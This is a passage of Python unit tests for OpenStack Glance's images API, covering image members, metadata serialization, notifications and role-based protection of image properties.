orig_value = res.headers[k]
req = webob.Request.blank('/images/%s' % UUID2)
req.headers[k] = v
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
prop = k[len('x-image-meta-'):]
self.assertNotEqual(res.body.find("Forbidden to modify \'%s\' "
"of active "
"image" % prop), -1)
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(orig_value, res.headers[k])
def test_props_of_active_image_mutable_for_admin(self):
"""
Tests admin can update 'immutable' props of active image
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=True)
fixture_header_list = [{'x-image-meta-checksum': '1234'},
{'x-image-meta-size': '12345'}]
for fixture_header in fixture_header_list:
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'PUT'
for k, v in fixture_header.iteritems():
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
orig_value = res.headers[k]
req = webob.Request.blank('/images/%s' % UUID2)
req.headers[k] = v
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(v, res.headers[k])
def test_replace_members_non_existing_image(self):
"""
Tests replacing image members raises right exception
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=True)
fixture = dict(member_id='pattieblack')
req = webob.Request.blank('/images/%s/members' % _gen_uuid())
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(image_memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_replace_members_bad_request(self):
"""
Tests replacing image members raises bad request if body is wrong
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=True)
fixture = dict(member_id='pattieblack')
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(image_memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_replace_members_positive(self):
"""
Tests replacing image members
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
fixture = [dict(member_id='pattieblack', can_share=False)]
# Replace
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
def test_replace_members_forbidden_by_policy(self):
rules = {"modify_member": '!'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}]
req = webob.Request.blank('/images/%s/members' % UUID1)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)
def test_replace_members_allowed_by_policy(self):
rules = {"modify_member": '@'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}]
req = webob.Request.blank('/images/%s/members' % UUID1)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
def test_add_member(self):
"""
Tests adding image members raises right exception
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=False)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 401)
def test_add_member_non_existing_image(self):
"""
Tests adding image members raises right exception
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
test_uri = '/images/%s/members/pattieblack'
req = webob.Request.blank(test_uri % _gen_uuid())
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_add_member_positive(self):
"""
Tests adding image members
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
def test_add_member_with_body(self):
"""
Tests adding image members
"""
fixture = dict(can_share=True)
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
req.body = json.dumps(dict(member=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
def test_add_member_forbidden_by_policy(self):
rules = {"modify_member": '!'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID1)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)
def test_add_member_allowed_by_policy(self):
rules = {"modify_member": '@'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID1)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
def test_get_members_of_deleted_image_raises_404(self):
"""
Tests members listing for deleted image raises 404.
"""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)
self.assertTrue(
'Image with identifier %s has been deleted.' % UUID2 in res.body)
def test_delete_member_of_deleted_image_raises_404(self):
"""
Tests deleting members of deleted image raises 404.
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)
self.assertTrue(
'Image with identifier %s has been deleted.' % UUID2 in res.body)
def test_update_members_of_deleted_image_raises_404(self):
"""
Tests update members of deleted image raises 404.
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}]
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)
self.assertTrue(
'Image with identifier %s has been deleted.' % UUID2 in res.body)
def test_create_member_to_deleted_image_raises_404(self):
"""
Tests adding members to deleted image raises 404.
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)
self.assertTrue(
'Image with identifier %s has been deleted.' % UUID2 in res.body)
def test_delete_member(self):
"""
Tests deleting image members raises right exception
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=False)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 401)
def test_delete_member_on_non_existing_image(self):
"""
Tests deleting image members raises right exception
"""
test_router = router.API(self.mapper)
api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)
test_uri = '/images/%s/members/pattieblack'
req = webob.Request.blank(test_uri % _gen_uuid())
req.method = 'DELETE'
res = req.get_response(api)
self.assertEquals(res.status_int, 404)
def test_delete_non_exist_member(self):
"""
Test deleting image members raises right exception
"""
test_router = router.API(self.mapper)
api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
req = webob.Request.blank('/images/%s/members/test_user' % UUID2)
req.method = 'DELETE'
res = req.get_response(api)
self.assertEquals(res.status_int, 404)
def test_delete_image_member(self):
test_rserver = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_rserver, is_admin=True)
# Add member to image:
fixture = dict(can_share=True)
test_uri = '/images/%s/members/test_add_member_positive'
req = webob.Request.blank(test_uri % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(member=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
# Delete member
test_uri = '/images/%s/members/test_add_member_positive'
req = webob.Request.blank(test_uri % UUID2)
req.headers['X-Auth-Token'] = 'test1:test1:'
req.method = 'DELETE'
req.content_type = 'application/json'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
self.assertTrue('Forbidden' in res.body)
def test_delete_member_allowed_by_policy(self):
rules = {"delete_member": '@', "modify_member": '@'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
def test_delete_member_forbidden_by_policy(self):
rules = {"delete_member": '!', "modify_member": '@'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)
class TestImageSerializer(base.IsolatedUnitTest):
def setUp(self):
"""Establish a clean test environment"""
super(TestImageSerializer, self).setUp()
self.receiving_user = 'fake_user'
self.receiving_tenant = 2
self.context = glance.context.RequestContext(
is_admin=True,
user=self.receiving_user,
tenant=self.receiving_tenant)
self.serializer = images.ImageSerializer()
def image_iter():
for x in ['chunk', '678911234', '56789']:
yield x
self.FIXTURE = {
'image_iterator': image_iter(),
'image_meta': {
'id': UUID2,
'name': 'fake image #2',
'status': 'active',
'disk_format': 'vhd',
'container_format': 'ovf',
'is_public': True,
'created_at': timeutils.utcnow(),
'updated_at': timeutils.utcnow(),
'deleted_at': None,
'deleted': False,
'checksum': 'PI:KEY',
'size': 19,
'owner': _gen_uuid(),
'location': "file:///tmp/glance-tests/2",
'properties': {},
}
}
def test_meta(self):
exp_headers = {'x-image-meta-id': UUID2,
'x-image-meta-location': 'file:///tmp/glance-tests/2',
'ETag': self.FIXTURE['image_meta']['checksum'],
'x-image-meta-name': 'fake image #2'}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
req.remote_addr = "127.0.0.1"
req.context = self.context
response = webob.Response(request=req)
self.serializer.meta(response, self.FIXTURE)
for key, value in exp_headers.iteritems():
self.assertEquals(value, response.headers[key])
def test_meta_utf8(self):
# We get unicode strings from JSON, and therefore all strings in the
# metadata will actually be unicode when handled internally. But we
# want to output utf-8.
FIXTURE = {
'image_meta': {
'id': unicode(UUID2),
'name': u'fake image #2 with utf-8 éàè',
'status': u'active',
'disk_format': u'vhd',
'container_format': u'ovf',
'is_public': True,
'created_at': timeutils.utcnow(),
'updated_at': timeutils.utcnow(),
'deleted_at': None,
'deleted': False,
'checksum': u'PI:KEY',
'size': 19,
'owner': unicode(_gen_uuid()),
'location': u"file:///tmp/glance-tests/2",
'properties': {
u'prop_éé': u'ça marche',
u'prop_çé': u'çé',
}
}
}
exp_headers = {'x-image-meta-id': UUID2.encode('utf-8'),
'x-image-meta-location': 'file:///tmp/glance-tests/2',
'ETag': 'PI:KEY',
'x-image-meta-size': '19', # str, not int
'x-image-meta-name': 'fake image #2 with utf-8 éàè',
'x-image-meta-property-prop_éé': 'ça marche',
'x-image-meta-property-prop_çé': u'çé'.encode('utf-8')}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
req.remote_addr = "127.0.0.1"
req.context = self.context
response = webob.Response(request=req)
self.serializer.meta(response, FIXTURE)
self.assertNotEqual(type(FIXTURE['image_meta']['name']),
type(response.headers['x-image-meta-name']))
self.assertEqual(response.headers['x-image-meta-name'].decode('utf-8'),
FIXTURE['image_meta']['name'])
for key, value in exp_headers.iteritems():
self.assertEquals(value, response.headers[key])
FIXTURE['image_meta']['properties'][u'prop_bad'] = 'çé'
self.assertRaises(UnicodeDecodeError,
self.serializer.meta, response, FIXTURE)
def test_show(self):
exp_headers = {'x-image-meta-id': UUID2,
'x-image-meta-location': 'file:///tmp/glance-tests/2',
'ETag': self.FIXTURE['image_meta']['checksum'],
'x-image-meta-name': 'fake image #2'}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.context = self.context
response = webob.Response(request=req)
self.serializer.show(response, self.FIXTURE)
for key, value in exp_headers.iteritems():
self.assertEquals(value, response.headers[key])
self.assertEqual(response.body, 'chunk67891123456789')
def test_show_notify(self):
"""Make sure an eventlet posthook for notify_image_sent is added."""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.context = self.context
response = webob.Response(request=req)
response.request.environ['eventlet.posthooks'] = []
self.serializer.show(response, self.FIXTURE)
#just make sure the app_iter is called
for chunk in response.app_iter:
pass
self.assertNotEqual(response.request.environ['eventlet.posthooks'], [])
def test_image_send_notification(self):
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.remote_addr = '127.0.0.1'
req.context = self.context
image_meta = self.FIXTURE['image_meta']
called = {"notified": False}
expected_payload = {
'bytes_sent': 19,
'image_id': UUID2,
'owner_id': image_meta['owner'],
'receiver_tenant_id': self.receiving_tenant,
'receiver_user_id': self.receiving_user,
'destination_ip': '127.0.0.1',
}
def fake_info(_event_type, _payload):
self.assertEqual(_payload, expected_payload)
called['notified'] = True
self.stubs.Set(self.serializer.notifier, 'info', fake_info)
glance.api.common.image_send_notification(19, 19, image_meta, req,
self.serializer.notifier)
self.assertTrue(called['notified'])
def test_image_send_notification_error(self):
"""Ensure image.send notification is sent on error."""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.remote_addr = '127.0.0.1'
req.context = self.context
image_meta = self.FIXTURE['image_meta']
called = {"notified": False}
expected_payload = {
'bytes_sent': 17,
'image_id': UUID2,
'owner_id': image_meta['owner'],
'receiver_tenant_id': self.receiving_tenant,
'receiver_user_id': self.receiving_user,
'destination_ip': '127.0.0.1',
}
def fake_error(_event_type, _payload):
self.assertEqual(_payload, expected_payload)
called['notified'] = True
self.stubs.Set(self.serializer.notifier, 'error', fake_error)
#expected and actually sent bytes differ
glance.api.common.image_send_notification(17, 19, image_meta, req,
self.serializer.notifier)
self.assertTrue(called['notified'])
def test_redact_location(self):
"""Ensure location redaction does not change original metadata"""
image_meta = {'size': 3, 'id': '123', 'location': 'http://localhost'}
redacted_image_meta = {'size': 3, 'id': '123'}
copy_image_meta = copy.deepcopy(image_meta)
tmp_image_meta = glance.api.v1.images.redact_loc(image_meta)
self.assertEqual(image_meta, copy_image_meta)
self.assertEqual(tmp_image_meta, redacted_image_meta)
def test_noop_redact_location(self):
"""Check no-op location redaction does not change original metadata"""
image_meta = {'size': 3, 'id': '123'}
redacted_image_meta = {'size': 3, 'id': '123'}
copy_image_meta = copy.deepcopy(image_meta)
tmp_image_meta = glance.api.v1.images.redact_loc(image_meta)
self.assertEqual(image_meta, copy_image_meta)
self.assertEqual(tmp_image_meta, redacted_image_meta)
self.assertEqual(image_meta, redacted_image_meta)
class TestFilterValidator(base.IsolatedUnitTest):
def test_filter_validator(self):
self.assertFalse(glance.api.v1.filters.validate('size_max', -1))
self.assertTrue(glance.api.v1.filters.validate('size_max', 1))
self.assertTrue(glance.api.v1.filters.validate('protected', 'True'))
self.assertTrue(glance.api.v1.filters.validate('protected', 'FALSE'))
self.assertFalse(glance.api.v1.filters.validate('protected', '-1'))
class TestAPIProtectedProps(base.IsolatedUnitTest):
def setUp(self):
"""Establish a clean test environment"""
super(TestAPIProtectedProps, self).setUp()
self.mapper = routes.Mapper()
# turn on property protections
self.set_property_protections()
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper))
db_api.setup_db_env()
db_api.get_engine()
db_models.unregister_models(db_api._ENGINE)
db_models.register_models(db_api._ENGINE)
def tearDown(self):
"""Clear the test environment"""
super(TestAPIProtectedProps, self).tearDown()
self.destroy_fixtures()
def destroy_fixtures(self):
# Easiest to just drop the models and re-create them...
db_models.unregister_models(db_api._ENGINE)
db_models.register_models(db_api._ENGINE)
def _create_admin_image(self, props={}):
request = unit_test_utils.get_fake_request(path='/images')
headers = {'x-image-meta-disk-format': 'ami',
'x-image-meta-container-format': 'ami',
'x-image-meta-name': 'foo',
'x-image-meta-size': '0',
'x-auth-token': 'user:tenant:admin'}
headers.update(props)
for k, v in headers.iteritems():
request.headers[k] = v
created_image = request.get_response(self.api)
res_body = json.loads(created_image.body)['image']
image_id = res_body['id']
return image_id
def test_prop_protection_with_create_and_permitted_role(self):
"""
As admin role, create and image and verify permitted role 'member' can
create a protected property
"""
image_id = self._create_admin_image()
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'x-image-meta-property-x_owner_foo': 'bar'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['x_owner_foo'], 'bar')
def test_prop_protection_with_create_and_unpermitted_role(self):
"""
As admin role, create an image and verify unpermitted role
'fake_member' can *not* create a protected property
"""
image_id = self._create_admin_image()
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:fake_member',
'x-image-meta-property-x_owner_foo': 'bar'}
for k, v in headers.iteritems():
another_request.headers[k] = v
another_request.get_response(self.api)
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)
self.assertIn("Property '%s' is protected" %
"x_owner_foo", output.body)
def test_prop_protection_with_show_and_permitted_role(self):
"""
As admin role, create an image with a protected property, and verify
permitted role 'member' can read that protected property via HEAD
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='HEAD', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:member'}
for k, v in headers.iteritems():
another_request.headers[k] = v
res2 = another_request.get_response(self.api)
self.assertEqual(res2.headers['x-image-meta-property-x_owner_foo'],
'bar')
def test_prop_protection_with_show_and_unpermitted_role(self):
"""
As admin role, create an image with a protected property, and verify
permitted role 'fake_role' can *not* read that protected property via
HEAD
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='HEAD', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:fake_role'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
self.assertEqual('', output.body)
self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers)
def test_prop_protection_with_get_and_permitted_role(self):
"""
As admin role, create an image with a protected property, and verify
permitted role 'member' can read that protected property via GET
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='GET', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:member'}
for k, v in headers.iteritems():
another_request.headers[k] = v
res2 = another_request.get_response(self.api)
self.assertEqual(res2.headers['x-image-meta-property-x_owner_foo'],
'bar')
def test_prop_protection_with_get_and_unpermitted_role(self):
"""
As admin role, create an image with a protected property, and verify
permitted role 'fake_role' can *not* read that protected property via
GET
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='GET', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:fake_role'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
self.assertEqual('', output.body)
self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers)
def test_prop_protection_with_detail_and_permitted_role(self):
"""
As admin role, create an image with a protected property, and verify
permitted role 'member' can read that protected property via
/images/detail
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='GET', path='/images/detail')
headers = {'x-auth-token': 'user:tenant:member'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
res_body = json.loads(output.body)['images'][0]
self.assertEqual(res_body['properties']['x_owner_foo'], 'bar')
def test_prop_protection_with_detail_and_unpermitted_role(self):
"""
As admin role, create an image with a protected property, and verify
permitted role 'fake_role' can *not* read that protected property via
/images/detail
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='GET', path='/images/detail')
headers = {'x-auth-token': 'user:tenant:fake_role'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
res_body = json.loads(output.body)['images'][0]
self.assertNotIn('x-image-meta-property-x_owner_foo',
res_body['properties'])
def test_prop_protection_with_update_and_permitted_role(self):
"""
As admin role, create an image with protected property, and verify
permitted role 'member' can update that protected property
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'x-image-meta-property-x_owner_foo': 'baz'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['x_owner_foo'], 'baz')
def test_prop_protection_with_update_and_unpermitted_role(self):
"""
As admin role, create an image with protected property, and verify
unpermitted role 'fake_role' can *not* update that protected property
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:fake_role',
'x-image-meta-property-x_owner_foo': 'baz'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)
self.assertIn("Property '%s' is protected" %
"x_owner_foo", output.body)
def test_prop_protection_update_without_read(self):
"""
Test protected property cannot be updated without read permission
"""
image_id = self._create_admin_image(
{'x-image-meta-property-spl_update_only_prop': 'foo'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_update_only_prop': 'bar'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)
self.assertIn("Property '%s' is protected" %
"spl_update_only_prop", output.body)
def test_prop_protection_update_noop(self):
"""
Test protected property update is allowed as long as the user has read
access and the value is unchanged
"""
image_id = self._create_admin_image(
{'x-image-meta-property-spl_read_prop': 'foo'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_read_prop': 'foo'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['spl_read_prop'], 'foo')
self.assertEquals(output.status_int, 200)
def test_prop_protection_with_delete_and_permitted_role(self):
"""
As admin role, create an image with protected property, and verify
permitted role 'member' can can delete that protected property
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'X-Glance-Registry-Purge-Props': 'True'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties'], {})
def test_prop_protection_with_delete_and_unpermitted_read(self):
"""
Test protected property cannot be deleted without read permission
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:fake_role',
'X-Glance-Registry-Purge-Props': 'True'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, 200)
self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers)
another_request = unit_test_utils.get_fake_request(
method='HEAD', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:admin'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
self.assertEqual('', output.body)
self.assertEqual(output.headers['x-image-meta-property-x_owner_foo'],
'bar')
def test_prop_protection_with_delete_and_unpermitted_delete(self):
"""
Test protected property cannot be deleted without delete permission
"""
image_id = self._create_admin_image(
{'x-image-meta-property-spl_update_prop': 'foo'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'X-Glance-Registry-Purge-Props': 'True'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, 403)
self.assertIn("Property '%s' is protected" %
"spl_update_prop", output.body)
another_request = unit_test_utils.get_fake_request(
method='HEAD', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:admin'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
self.assertEqual('', output.body)
self.assertEqual(
output.headers['x-image-meta-property-spl_update_prop'], 'foo')
def test_read_protected_props_leak_with_update(self):
"""
Verify when updating props that ones we don't have read permission for
are not disclosed
"""
image_id = self._create_admin_image(
{'x-image-meta-property-spl_update_prop': '0',
'x-image-meta-property-foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_update_prop': '1',
'X-Glance-Registry-Purge-Props': 'False'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['spl_update_prop'], '1')
self.assertNotIn('foo', res_body['properties'])
def test_update_protected_props_mix_no_read(self):
"""
Create an image with two props - one only readable by admin, and one
readable/updatable by member. Verify member can sucessfully update
their property while the admin owned one is ignored transparently
"""
image_id = self._create_admin_image(
{'x-image-meta-property-admin_foo': 'bar',
'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'x-image-meta-property-x_owner_foo': 'baz'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['x_owner_foo'], 'baz')
self.assertNotIn('admin_foo', res_body['properties'])
def test_update_protected_props_mix_read(self):
"""
Create an image with two props - one readable/updatable by admin, but
also readable by spl_role. The other is readable/updatable by
spl_role. Verify spl_role can successfully update their property but
not the admin owned one
"""
custom_props = {
'x-image-meta-property-spl_read_only_prop': '1',
'x-image-meta-property-spl_update_prop': '2'
}
image_id = self._create_admin_image(custom_props)
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
# verify spl_role can update it's prop
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_read_only_prop': '1',
'x-image-meta-property-spl_update_prop': '1'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(output.status_int, 200)
self.assertEqual(res_body['properties']['spl_read_only_prop'], '1')
self.assertEqual(res_body['properties']['spl_update_prop'], '1')
# verify spl_role can not update admin controlled prop
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_read_only_prop': '2',
'x-image-meta-property-spl_update_prop': '1'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 403)
def test_delete_protected_props_mix_no_read(self):
"""
Create an image with two props - one only readable by admin, and one
readable/deletable by member. Verify member can sucessfully delete
their property while the admin owned one is ignored transparently
"""
image_id = self._create_admin_image(
{'x-image-meta-property-admin_foo': 'bar',
